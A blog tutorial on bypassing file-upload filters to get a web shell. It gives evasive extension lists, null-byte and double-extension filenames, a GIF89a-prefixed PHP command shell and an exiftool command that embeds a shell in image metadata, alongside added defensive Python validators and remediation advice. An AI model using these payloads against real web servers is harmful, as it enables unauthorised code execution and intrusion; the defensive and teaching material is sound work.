Published in CodeX

Bypass File Upload Restrictions

How to Get a Shell on a Website using a File [Tutorial]

Let’s get into this -

User-uploaded files give attackers a potential entry point into web apps, which makes their safe handling an extremely important task for administrators and the security team. If these files are not validated properly, a remote attacker could upload a malicious file to the web server and cause a serious breach. Malicious file uploads are the result of improper file validation, and they can lead to code execution. According to OWASP, unrestricted file upload vulnerabilities can allow two different types of attacks. Usually web apps have restrictions that try to make this kind of attack more difficult, but there are various techniques hackers use to beat file upload restrictions and get a reverse shell.

The Blacklist And Bypass 1

Blacklisting is a type of protection where certain strings of data, in many cases specific extensions, are explicitly prohibited from being sent to the web app server. This may sound like the right solution to prevent dangerous extensions, often shells, from being uploaded to your website, but blacklists aren’t hard to bypass.

Here are some alternative extensions that can be used to get around blacklist filters:

php.txt, .sh, .pht, .phtml, .phP, .Php, .php7, .php%00.jpeg, .cgi

Another popular extension for web shells is JSP. A JSP file is a server-generated web page, similar to an .ASP or .PHP file, but it contains Java code instead of ActiveX or PHP.

.MF, .jspx, .jspf, .jsw, .jsv, xml, .war, .jsp, .aspx

Whitelist and Bypass 2

Method two is using whitelists. Whitelisting, as the name says, is the opposite of blacklisting: the server’s whitelist will only accept jpeg, gif, png, jpg, etc. This may sound like a better way of protecting your server than using a blacklist, but it can still be bypassed using a few tricks. There are some pitfalls in this method too. There are records of server-side bugs allowing users to bypass this protection; one of these is:

The IIS 6 semicolon vulnerability, caused by a parser bug that allowed users to upload and execute files with names such as testing.asp;.jpg

Using a reverse shell with a photo extension, hackers can fool the web app into accepting a PHP file that also has a JPG/PNG extension:

payload.php.jpg

Null character injection can also bypass whitelist filters: the characters after the null byte are dropped when the file is saved, so injecting one between a forbidden extension and an allowed extension can lead to a bypass:

payload.php%00.jpg OR payload.php\x00.jpg

Usually, if a whitelist accepts only images, it may also accept GIF files. Adding GIF89a; to the very top of your shell may help you bypass the restriction and let you execute the shell.

GIF89a; <?php system($_GET['cmd']); ?>
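To see why the blacklist described above is so easy to get around, and what a strict filename check looks like, here is an added Python example (it is not code from the original post): a naive blacklist that only refuses `.php`, next to an allowlist validator that rejects the case variants, double extensions, null bytes and semicolon names listed in this article. The function names, the blacklist contents and the sample filenames are assumptions made for the example.

```python
"""Filename validation: a naive blacklist beside a strict allowlist check.

Added example; the blacklist contents, function names and sample names
are assumptions, not taken from any real application.
"""
import os
import re
from urllib.parse import unquote

# The kind of blacklist many apps ship with: only the obvious extension is refused.
BLACKLIST = {".php"}

# Extensions a strict image allowlist accepts (compared case-insensitively).
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}


def blacklist_accepts(filename: str) -> bool:
    """Naive check: reject only when the final extension is exactly in BLACKLIST."""
    _, ext = os.path.splitext(filename)
    return ext not in BLACKLIST


def allowlist_accepts(filename: str) -> bool:
    """Strict check: exactly one extension, drawn from ALLOWLIST, on a plain name."""
    # Decode percent-encoding once so "%00" is judged as the null byte it becomes server-side.
    name = unquote(filename)
    # Refuse control characters (including NUL) and anything that is not a bare filename.
    if any(ord(c) < 0x20 for c in name):
        return False
    if "/" in name or "\\" in name or name != os.path.basename(name):
        return False
    # Exactly one dot: no double extensions (payload.php.jpg) and no dotfiles (.htaccess).
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    base, ext = parts
    # Base name limited to a safe character set, which also rejects "testing.asp;.jpg"-style names.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", base):
        return False
    return "." + ext.lower() in ALLOWLIST


# Constructed sample names covering the bypasses discussed in the article.
SAMPLES = [
    "shell.php",
    "shell.phP",
    "shell.phtml",
    "payload.php.jpg",
    "payload.php%00.jpg",
    "testing.asp;.jpg",
    ".htaccess",
    "catphoto.JPG",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:28} blacklist={blacklist_accepts(sample)!s:5} allowlist={allowlist_accepts(sample)}")
```

Even when a name passes `allowlist_accepts`, the client's filename should not be used on disk; the check only decides whether the declared type is acceptable. `unquote` is applied once on purpose: a name containing `%00` must be judged on the bytes it becomes after the web server decodes it.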

Exif Data, ExifTool and Bypass 3

The next method to bypass file upload restrictions uses the Exif data in an image, which holds fields such as the location, name, camera being used, and much more. A comment inserted there containing a reverse shell payload may be executed by the web app whenever the image is uploaded.

You can add your payload using a tool like exiftool.

Inserting a short command shell as metadata into your photo may look something like this:

$ exiftool -DocumentName="<h1>chiara<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" pwtoken.jpeg

You can use exiftool to check for the newly added comment in your photo.

$ exiftool pwtoken.jpeg

Then just add a shell extension to make it an executable file once on the web app server:

$ mv catphoto.jpg catphoto.php\x00.jpg

Use this together with the methods mentioned earlier in this article to bypass blacklists, whitelists, or both.

Remediation

Restrict the file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename, like .htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the files within it are not executable. If possible, rename the files that are uploaded.
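The Exif technique and the remediation list both come down to one point: the filename says nothing about what the file contains, so the server has to look at the bytes and choose the stored name itself. The following added Python example (not code from the original post, and not part of exiftool) checks that the leading bytes match the declared image type, rejects any file carrying a PHP open tag, including the GIF89a trick from the whitelist section and a PHP tag smuggled into a JPEG comment segment the way the exiftool step smuggles one into metadata, and generates a server-side storage name. The sample byte strings are constructed for the example, and the helper names are assumptions.

```python
"""Content checks for uploaded images plus a server-chosen storage name.

Added example; the helper names are assumptions and the byte strings below
are constructed samples, not real uploads.
"""
import re
import secrets

# Signature each allowlisted image type must start with.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

# PHP open tags. A genuine image never needs these bytes, so finding them anywhere
# (pixel data, Exif/XMP comment, or a trailer appended after the image) is grounds to reject.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def magic_matches(data: bytes, ext: str) -> bool:
    """True when the file starts with a signature valid for the declared extension."""
    return any(data.startswith(sig) for sig in MAGIC.get(ext.lower(), ()))


def contains_php(data: bytes) -> bool:
    """True when a PHP open tag occurs anywhere in the file body."""
    return PHP_TAG.search(data) is not None


def inspect_upload(data: bytes, ext: str) -> str:
    """Return 'ok' or a short reason for rejection."""
    if not magic_matches(data, ext):
        return "magic-mismatch"
    if contains_php(data):
        return "embedded-php"
    return "ok"


def storage_name(ext: str) -> str:
    """Discard the client's filename: random name plus an allowlisted extension the server chose."""
    ext = ext.lower()
    if ext not in MAGIC:
        raise ValueError("extension not allowlisted")
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed samples.
# 1. The GIF89a trick: a GIF header followed by a web shell.
GIF_SHELL = b"GIF89a; <?php system($_GET['cmd']); ?>"
# 2. A minimal 1x1 GIF with no code inside.
CLEAN_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
)
# 3. A JPEG whose COM segment (marker FF FE, length includes the 2 length bytes) carries a PHP tag,
#    mimicking a shell planted in metadata.
PHP_COMMENT = b"<?php system($_REQUEST['cmd']); ?>"
JPEG_META_SHELL = (
    b"\xff\xd8\xff\xfe" + (len(PHP_COMMENT) + 2).to_bytes(2, "big") + PHP_COMMENT + b"\xff\xd9"
)
# 4. A PHP script simply renamed to .jpg: wrong leading bytes.
RENAMED_PHP = b"<?php phpinfo(); ?>"

if __name__ == "__main__":
    for label, data, ext in [
        ("gif89a shell", GIF_SHELL, "gif"),
        ("clean gif", CLEAN_GIF, "gif"),
        ("jpeg comment shell", JPEG_META_SHELL, "jpeg"),
        ("renamed php", RENAMED_PHP, "jpg"),
    ]:
        print(f"{label:20} -> {inspect_upload(data, ext)}")
    print("stored as:", storage_name("jpeg"))
```

Scanning for open tags is a cheap detection layer, not a replacement for the other controls in the list above: re-encoding the image with an image library strips metadata entirely, and keeping uploads in a directory the web server will not execute means no interpreter ever runs the file even if a check is wrong.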

— — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Need Your Help — If someone from {Australia, Austria, Belgium, Canada, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hong Kong, Ireland, Italy, Japan, Latvia, Lithuania, Luxembourg, Mexico, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Singapore, Slovakia, Slovenia, Spain, Sweden, Switzerland, United Kingdom, United States}

Please DM me on my social media handle or mail me at surendrachoudhary2976@gmail.com

— — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Ending -

I hope you now understand file upload vulnerabilities.

You can subscribe to my YouTube channel for future hacking-related videos and updates!
Channel link — https://www.youtube.com/c/TechnicalSurendrachannel

Thanks for reading this blog. If you find it valuable then give it some applause 👏👏, follow me, and share this blog with your friends and other communities. I will see you in the next blog. Till then, keep learning, keep exploring!

Peace ✌ !

My social media accounts -

https://expy.bio/SurendraPander
Twitter — https://twitter.com/technicalSure
YouTube — https://www.youtube.com/channel/UCZq87M0I0-zEfLuyyfEeE6Q
Instagram — https://www.instagram.com/surendra_choudhary1241/
Linkedin — https://www.linkedin.com/in/surendra-pander-4066761b7/

Surendra Choudhury

Security researcher | Ethical Hacker | Penetration tester | CTF Lover | Bug Bounty hunter | YouTuber(Technicalsurendra) | Music lover |😍 |